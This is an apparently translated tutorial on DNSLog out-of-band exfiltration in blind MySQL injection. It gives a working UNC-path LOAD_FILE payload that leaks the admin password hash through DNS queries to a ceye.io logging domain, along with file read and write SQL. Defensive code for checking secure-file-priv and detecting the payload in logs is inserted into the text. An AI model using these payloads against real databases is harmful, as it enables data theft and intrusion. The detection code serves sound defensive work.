What is the method of DNSLog in MySQL injection

2025-01-16 update. From: SLTechnology News&Howtos > Network Security

Shulou (Shulou.com) 06/01 report

This article introduces the DNSLog method in MySQL injection. In daily work many people have questions about how DNSLog is used in MySQL injection, so the material below has been collected and sorted into a simple, easy-to-follow procedure. Let's learn it together.

About DNSLog exploitation in web attacks

Put simply: in some situations a vulnerability cannot be exploited directly to obtain echoed output, but the target can still initiate DNS requests. In that case the data you want can be carried out through DNSLog, that is, through the DNS queries the target makes to a domain you control.

In what circumstances is it commonly used?

Blind SQL injection

Command execution without echo

SSRF without echo

Fundamentals of the DNSLog attack

As the attacker, you submit an injection statement that makes the database concatenate the value to be queried with a domain name, so that a DNS query for that name occurs. As long as you can read the DNS log, you obtain the value. So you need your own domain name, configure an NS record for it at the domain registrar, and then collect the DNS logs on that NS server.

DNSLog SQL injection in the MySQL database

The most common injection scenario, injection into the condition after WHERE, is demonstrated here. The test environment has a test_user table with three fields, id, user and pass, as follows:

id  user   pass
1   admin  admin123

Finally, instead of building a DNS server yourself, you can use ceye.io directly, which integrates DNSLog functionality.

Required conditions

load_file() enabled in MySQL

A DNSLog platform (hyuga, CEYE)

Windows platform

MySQL server-side file reading and writing

Condition: the server is configured with readable/writable directories and the MySQL user has the correct permissions.

Security restrictions

Reading files on the MySQL server is subject to many restrictions, mainly from the MySQL configuration. For security reasons, a text file on the server can only be read if it lies in the permitted database directory and is readable by everyone. You can check this by executing show variables like '%secure%'.

The secure-file-priv parameter limits the directories in which LOAD DATA, SELECT ... INTO OUTFILE, INTO DUMPFILE and LOAD_FILE() may operate.

The value of secure-file-priv falls into three cases:

The value of secure-file-priv is NULL: mysqld does not allow file import or export at all.

The value of secure-file-priv is /tmp/: mysqld restricts import and export to the /tmp/ directory, and reading or writing in any other folder reports an error.

The value of secure-file-priv is empty (no specific value): mysqld places no restriction on import or export.

In addition, the MySQL user must hold the privilege needed to read or write files (the FILE privilege); otherwise an error is reported:
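To make the three cases concrete, here is a small model of the secure-file-priv policy, added as an illustration (not MySQL's own code): None stands for SQL NULL, the empty string for the unset value, and a directory string for a restricted directory.

```python
import os

# Assumed representation: None == NULL, '' == empty/unset, otherwise a directory path.
# Real MySQL also resolves symlinks before comparing; this model only normalises '..'.
def secure_file_priv_permits(setting, path):
    """Return True if LOAD_FILE()/LOAD DATA/INTO OUTFILE may touch `path` under `setting`."""
    if setting is None:              # NULL: file import/export disabled entirely
        return False
    if setting == '':                # empty: no directory restriction (weakest setting)
        return True
    allowed = os.path.normpath(setting)
    target = os.path.normpath(path)  # collapses '..' so traversal cannot escape the directory
    return target.startswith(allowed + os.sep)

def audit_secure_file_priv(setting):
    """Classify a setting the way a hardening check would."""
    if setting is None:
        return 'disabled'
    return 'unrestricted' if setting == '' else 'restricted'
```

The 'unrestricted' result is the one a hardening review should flag, since it removes the directory check that the other two cases provide.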

ERROR 1045 (28000): Access denied for user

Reading a file

SELECT LOAD_FILE('/var/lib/mysql-files/aaa') AS Result;
create database test;
create table test (id TEXT, content TEXT);
load data infile "/var/lib/mysql-files/aaa" into table test.test FIELDS TERMINATED BY '\n\r';

Writing a file

select group_concat(id) from test INTO DUMPFILE "/var/lib/mysql-files/aaaaa";

load_file

In practice, MySQL is probably the database most often used with DNSLog.

In MySQL, there is a load_file function that can be used to read local files.

http://127.0.0.1/mysql.php?id=1 union select 1,2,load_file(concat('\\\\',(SELECT hex(pass) FROM test.test_user WHERE user='admin' LIMIT 1),'.mysql.nk40ci.ceye.io\\abc'))

You can see that the hex encoding of the pass field value in test_user is what gets queried. Why hex-encode here? To reduce interference: database field values often contain special symbols that cannot be placed in a domain name, and since domain names follow strict rules, a DNS query containing such symbols would not be made at all.

Note: under Linux the load_file function cannot be used for DNSLog attacks, because the technique relies on Windows UNC paths.

UNC path

Baidu's explanation of UNC paths:

UNC is a naming convention used mainly to designate and map network drives on Microsoft Windows. UNC naming is most often applied when accessing file servers or printers on a local area network; it is the form we use to share files over a network.

In fact, when sharing files in Windows we usually use a network address of this form:

\\sss.xxx\test\

This also explains why CONCAT() is given four backslashes: because of escaping, the four backslashes become two, and the purpose is to produce a UNC path.

Because Linux has no UNC paths, MySQL cannot take data out this way when it is running on a Linux system.
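From the defender's side, the technique described above leaves two traces: the load_file(concat('\\\\', ...)) payload in the web server's access log and a long hex-looking leftmost label in DNS query logs. The following detector is an added example (not code from the original article) and runs over constructed sample lines; dnslog.example is a placeholder zone.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines (not real traffic). The first access-log entry carries the
# UNC-style load_file(concat('\\\\', hex(...), '.<zone>\\abc')) payload discussed above;
# the DNS lines mimic a resolver query log for the placeholder zone dnslog.example.
ACCESS_LOG = [
    '10.0.0.5 - - [16/Jan/2025:10:00:01 +0000] "GET /mysql.php?id=1%20union%20select%201,2,'
    'load_file(concat(%27%5C%5C%5C%5C%27,(SELECT%20hex(pass)%20FROM%20test.test_user'
    '%20WHERE%20user=%27admin%27%20LIMIT%201),%27.mysql.dnslog.example%5C%5Cabc%27))'
    ' HTTP/1.1" 200 512',
    '10.0.0.6 - - [16/Jan/2025:10:00:02 +0000] "GET /mysql.php?id=2 HTTP/1.1" 200 512',
]
DNS_LOG = [
    'client 10.0.0.5#51234: query: 61646d696e313233.mysql.dnslog.example IN A +',
    'client 10.0.0.7#51235: query: www.dnslog.example IN A +',
]

# LOAD_FILE fed a CONCAT() whose first literal starts with two or more backslashes (a UNC path).
UNC_LOAD_FILE = re.compile(r"load_file\s*\(\s*concat\s*\(\s*['\"]\\{2,}", re.IGNORECASE)
REQUEST = re.compile(r'"(?:GET|POST)\s+(\S+)')
QUERY_NAME = re.compile(r'query:\s+(\S+)\s+IN\s+')
HEX_LABEL = re.compile(r'^(?:[0-9a-f]{2}){4,}$', re.IGNORECASE)  # even-length hex, 8+ chars

def flag_unc_load_file(lines):
    """Return the URL-decoded request targets that build a UNC path for LOAD_FILE()."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        target = unquote(m.group(1))  # payload is URL-encoded in the raw log
        if UNC_LOAD_FILE.search(target):
            hits.append(target)
    return hits

def flag_hex_labels(lines, zone):
    """Return (name, decoded bytes) for queries under `zone` whose leftmost label is hex."""
    hits = []
    for line in lines:
        m = QUERY_NAME.search(line)
        if not m:
            continue
        name = m.group(1).rstrip('.')
        if not name.endswith('.' + zone):
            continue
        label = name.split('.')[0]
        if HEX_LABEL.match(label):
            hits.append((name, bytes.fromhex(label)))  # decode to assess what was exposed
    return hits
```

Treat a hex label as a triage signal rather than proof, since ordinary hostnames made only of the letters a to f and digits also match; correlating it with the access-log hit from the same client is what confirms the exfiltration.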

This concludes the study of the DNSLog method in MySQL injection; hopefully it has answered your questions. Theory and practice go better together, so go and try it. To keep learning related material, keep following this website, which will continue to publish practical articles.
